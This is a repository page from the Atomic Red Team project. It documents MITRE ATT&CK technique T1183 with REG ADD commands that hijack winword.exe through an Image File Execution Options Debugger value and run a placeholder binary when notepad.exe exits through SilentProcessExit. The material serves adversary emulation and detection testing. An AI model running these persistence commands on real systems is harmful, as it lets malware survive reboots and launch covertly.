security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
dbed78fddd3166dd23edbb853bb6467e6a0d7285
atomic-red-team/Windows/Persistence/Image_File_Execution_Options_Injection.md
T
api0cradle 92ab19d773 Created T1191 and T1183, added technique to T1060
2018-04-17 11:58:38 +02:00

691 B
Raw Blame History

Image File Execution Options

MITRE ATT&CK Technique: T1183

Debugger

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winword.exe" /v Debugger /d "C:\folder\AtomicRedTeam.exe"

GlobalFlags

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\folder\AtomicRedTeam.exe"

Reference in New Issue View Git Blame Copy Permalink